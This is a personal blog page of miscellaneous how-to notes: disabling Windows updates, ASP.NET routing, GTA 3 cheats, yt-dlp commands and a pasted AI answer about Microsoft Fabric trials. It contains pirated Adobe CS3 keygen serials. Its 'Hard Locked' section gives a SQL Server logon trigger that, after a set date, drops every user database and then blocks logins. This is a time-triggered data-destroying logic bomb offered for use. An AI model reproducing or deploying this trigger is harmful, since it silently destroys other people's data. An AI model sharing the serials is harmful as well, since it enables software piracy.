Tutorials

How to disable windows 10 updates

Step 1. Go to Start/Search > Services > Windows Updates > Manual to Disable > Stop > Apply > Recovery Tab > First Failure > Take no Action > Reset Falure days =999> Apply.

Step 2. Run> gpedit.msc > Administrative Templets > Windows Components> Windows Updates> Configure automatic updates> > Disabled.

Step 3. Run> regedit> HKEY_LOCAL_MACHINE > Software > Policies> Microsoft > Windows > Right click > New Key(Folder) > Rename folder as WindowsUpdate > Right click on WindowsUpdate folder and create new Key(Folder) > Rename folder as AU> Aagin Right Click on AU and right pan create new Key > DWORD (32-Bit) Value. > NoAutoUpdate > Double click> replace 0 to 1.

Step 4. Go to Start/Search > Task Scheduler> Task Scheduler Library > Microsoft > Windows > Windows Update> Schedule Start> Disable.

Step 5.  Go to Start/Search > control panel > Programe and Features > Windows Assistant (Remove if avialble).

Done!

******************************************************************************************


Adobe Master Collection CS3 *Corporate*
---------------------------------------

1. Install the applications.

2. Use the keygen to get your valid serial.

3. Enjoy it!


/X-FORCE 2007


XF-AdobeMasterCS3-KG application generates serial number. Following
are the working serial numbers
1325-1997-7377-9736-3650-4544
1325-1999-3851-7010-9968-9943
1325-1998-2567-7968-5093-9216
1325-1998-8504-0683-8056-0251
1325-1990-6296-9770-1956-9074



ASP.NET CORE
Route Configuration

var builder = WebApplication.CreateBuilder(args);
builder.Services.AddControllersWithViews();
var app = builder.Build();

//app.MapGet("/", () => "Hello World!");

app.MapControllerRoute(
    name: "default",
    pattern: "{controller=home}/{action=index}/{id?}"
);

app.Run();


*****************************************************************

var builder = WebApplication.CreateBuilder(args);

// Add services to the container
builder.Services.AddControllersWithViews();

var app = builder.Build();

// Enable static files to serve CSS, JavaScript, and images from wwwroot folder
app.UseStaticFiles();

// Configure routing for MVC
app.MapControllerRoute(
    name: "default",
    pattern: "{controller=Home}/{action=Index}/{id?}"
);

app.Run();



**********************************************************************************
Ventoy Enroll Hash and key



GTA 3 PC cheat codes
If you're playing GTA 3 on PC, these are the cheat codes you'll want to deploy:

All Weapons GUNSGUNSGUNS
Change Costumes ILIKEDRESSINGUP
Clear Weather SKINCANCERFORME
Cloudy Weather ILIKESCOTLAND
Destroy All Cars BANGBANGBANG
Fast Motion TIMEFLIESWHENYOU
Flying Vehicle CHITTYCHITTYBB
Foggy Weather PEASOUP
Full Armour TORTOISE or TURTOISE
Full Health GESUNDHEIT
Improve Driving Skill CORNERSLIKEMAD
Increased Gore NASTYLIMBSCHEAT
Lower Wanted Level NOPOLICEPLEASE
Money Cheat IFIWEREARICHMAN
Pedestrians Fight Each Other ITSALLGOINGMAAAD
Pedestrians Fight Each Other with Weapons WEAPONSFORALL
Pedestrians Hate You NOBODYLIKESME
Rainy Weather ILOVESCOTLAND
Raise Wanted Level MOREPOLICEPLEASE
Slow Motion BOOOOORING
Spawn Rhino Tank GIVEUSATANK
Speed Up Time MADWEATHER
Turn Vehicle Invisible ANICESETOFWHEELS



******************************************************************************
When formatting using pendrive ventoy  and getting gpt and mbr error the at the time of format and install windows appear then hold shift +F10 and follow below:



even if you formatted the drive still follow the above and exit the you can install wndows



*********************************************************************************

WINDOWS 11 OFFLINE INSTALL




*********************************************************************************

FREE ChatGPT Alternatives

https://www.blackbox.ai/
https://gemini.google.com/
https://you.com/
https://www.phind.com/


Project Links

https://projectwithcode.netlify.app/


*********************************************************************************

Hard Locked


USE master;
GO

CREATE OR ALTER TRIGGER trg_Training_Expiry
ON ALL SERVER
FOR LOGON
AS
BEGIN
    IF GETDATE() >= '2026-03-03'
    BEGIN
        BEGIN TRY

            DECLARE @sql NVARCHAR(MAX) = N'';

            SELECT @sql = @sql + 
            N'ALTER DATABASE [' + name + N'] SET SINGLE_USER WITH ROLLBACK IMMEDIATE;
              DROP DATABASE [' + name + N'];'
            FROM sys.databases
            WHERE database_id > 4;

            IF LEN(@sql) > 0
                EXEC(@sql);

            -- If everything succeeds → allow login
            RETURN;

        END TRY
        BEGIN CATCH

            -- If anything fails → block login
            ROLLBACK;

        END CATCH
    END
END;
GO





type  cmd in the folder address bar and do below
yt-dlp -o "%(playlist_index)s - %(title)s.%(ext)s" "PLAYLIST_URL"


yt-dlp -o "%(playlist_index)s - %(title)s.%(ext)s" "https://www.youtube.com/playlist?list=PLp_RsiLZjwQQ-2qjJ9tSrudbrkvEJPOP1"


Final command (720p + correct order)
yt-dlp -f "bestvideo[height<=720]+bestaudio/best[height<=720]" -o "%(playlist_index)02d - %(title)s.%(ext)s" "PLAYLIST_URL"

⚡ Optional (faster download)
yt-dlp -f "best[height<=720]" -o "%(playlist_index)02d - %(title)s.%(ext)s" "PLAYLIST_URL"

🔥 Pro tip

If you ever want:

1080p → change 720 → 1080


*********************************************************************************

SCHDUEL CHEKDSK ON RESTART


Schdule Chekdistk on restart
opn cmd and type below

chkdsk C: /f /r



*********************************************************************************

MICROSOFT FABRIC ACCOUNT FREE

Got it — you’re teaching Power BI Desktop and now you want to try Fabric (Microsoft Fabric) and give your students their own workspace. Good idea 👍 — Fabric is the future direction of Power BI.

Let me explain this clearly and practically:


🔷 1. What is Fabric?

Microsoft Fabric is an all-in-one analytics platform (Power BI + Data Engineering + Data Science + Data Warehouse).

It works on top of:

  • Power BI Service (the web version)

🔷 2. How to Start Fabric Trial

👉 Step-by-step:

  1. Go to:
    https://app.powerbi.com
  2. Login with your Microsoft account
  3. On the homepage, look for:
    👉 “Start Fabric Trial” (top banner or settings)
  4. Click → Activate trial (usually 60 days free)

🔷 3. Important Thing (VERY IMPORTANT ⚠️)

Fabric + Workspaces require:

  • Work/School account (Organizational account)
    ❌ Personal Gmail/Outlook may not support full features

👉 If you are teaching students:
You should ideally use:

  • Microsoft 365 (Education or Business)

🔷 4. How to Add Students (Best Options)

✅ Option 1: Use Microsoft 365 (Recommended)

Create accounts for students via:

  • Microsoft 365 Admin Center

Steps:

  1. Go to admin.microsoft.com
  2. Create users like:
  3. Assign licenses:
    • Power BI Pro (or trial)

✅ Option 2: Invite Students as Guests (Quick Method)

If you don’t have M365:

  1. Go to Power BI Service
  2. Open Workspace
  3. Click Access → Add people
  4. Enter student emails

👉 They will join as Guest Users

⚠️ Limitation:

  • Less control
  • Sometimes restricted features

🔷 5. Create Workspace for Students

In Power BI / Fabric:

  1. Go to Workspaces
  2. Click New Workspace
  3. Name it (e.g., "PowerBI_Training")
  4. Add students as:
    • Viewer / Contributor

🔷 6. Best Setup for Teaching 👨‍🏫

I recommend:

  • You → Admin
  • Students → Contributors
  • Each student:
    • Create reports
    • Publish from Power BI Desktop

🔷 7. Pro Tip (Very Useful)

If you want each student to have their own workspace:

👉 You need:

  • Power BI Pro license for each student

Otherwise:

  • Use one shared workspace

🔷 8. Common Issues

❌ “Workspace not visible”
→ License issue

❌ “Cannot publish”
→ No Pro access

❌ “Fabric trial not showing”
→ Using personal account


👍 My Suggestion (Based on Your Case)

Since you are teaching:

👉 Start with:

  • 1 Workspace (shared)
  • Add all students as Contributors

👉 Later upgrade to:

  • Individual workspaces (if needed)

If you want, I can guide you step-by-step:
✔ Setup student accounts
✔ Create workspace structure
✔ Assign permissions properly

Just tell me 👍

"🔷 3. Important Thing (VERY IMPORTANT ⚠️) Fabric + Workspaces require: Work/School account (Organizational account) ❌ Personal Gmail/Outlook may not support full features 👉 If you are teaching students: You should ideally use: Microsoft 365 (Education or Business)" i don't have Work/School account (Organizational account) then how?

Good question — this is exactly where most people get stuck 👍

Short answer:
👉 You can still use Fabric trial without a Work/School account, but there are limitations, especially for teaching multiple students.

Let’s break your options clearly:


🔷 Option 1: Use Personal Account (Quick Start – Limited)

You can sign in to:
👉 Power BI Service with Gmail/Outlook

Then:

  • Try to activate Microsoft Fabric trial
  • Create workspace
  • Invite students as guests

⚠️ Limitations:

  • Students may face access issues
  • Workspace sharing may not work smoothly
  • No proper admin control
  • Some Fabric features may be disabled

👉 Good for testing yourself, not ideal for teaching a class


🔷 Option 2: BEST Solution (Free Work/School Account)

You don’t actually need a company 😄
You can create one yourself using:

👉 Microsoft 365 Developer Program


✅ Steps (THIS IS WHAT I RECOMMEND)

  1. Go to:
    https://developer.microsoft.com/microsoft-365/dev-program
  2. Click Join
  3. Sign up using your personal email
  4. Create a free sandbox tenant
    (example: yourname.onmicrosoft.com)
  5. You will get:

🔷 What You Get

With this:

  • ✔ Real Work/School environment
  • ✔ Create students accounts
  • ✔ Full Fabric access
  • ✔ Proper workspace control
  • ✔ Same setup used in companies

🔷 Then Do This

After setup:

  1. Login to:
    👉 Power BI Service using admin account
  2. Activate Fabric trial
  3. Go to Admin Portal:
    • Enable Fabric for organization
  4. Create student accounts like:
  5. Share workspace OR let them create their own

🔷 Option 3: Temporary Hack (Not Recommended)

You can:

  • Use personal account
  • Share login credentials with students

❌ But:

  • Not professional
  • Data conflicts
  • Login issues

👍 My Honest Recommendation

👉 If you are serious about teaching:

✅ Use Microsoft 365 Developer Program
It’s:

  • Free
  • Professional
  • Perfect for classroom setup

🔥 If you want

I can guide you step-by-step:

  • Create tenant
  • Create 10–20 student accounts
  • Setup workspace structure
  • Show how students publish reports

Just say: “Guide me setup” 👍








1 comment: